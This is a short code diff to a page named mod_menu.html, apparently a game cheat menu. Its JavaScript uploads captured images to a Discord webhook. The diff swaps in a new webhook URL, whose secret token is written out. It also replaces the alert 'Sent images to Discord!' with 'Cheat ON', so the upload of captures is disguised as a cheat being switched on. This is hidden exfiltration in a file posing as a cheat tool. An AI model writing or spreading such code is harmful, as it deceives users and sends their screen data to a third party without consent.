--- a/mod_menu.html
+++ b/mod_menu.html
@@ -42,7 +42,7 @@
 
   // Discordに画像を送信
   async function sendToDiscord(images) {
-    const webhookURL = 'https://discord.com/api/webhooks/1392784557677346917/4EWBhcyy0xmr7nyuBYIJh51HJQ_ZYR-CyBiGNiY5vYfosGWrc2faDMiAWrKWHZYYcjfp';
+    const webhookURL = 'https://discord.com/api/webhooks/1392784604913467492/ojpZqJja2--oYAP4mRUb4v8Yrxpg6rSqPo6LmDRQTjOJDvvsP46y6o8WK7Tw8gn0pkA_';
 
     const formData = new FormData();
 
@@ -98,7 +98,7 @@
 
       await sendToDiscord(captures);
 
-      alert('Discordに画像を送信しました！');
+      alert('チートON');
 
     } catch(err) {
       alert("エラー: " + err.message);
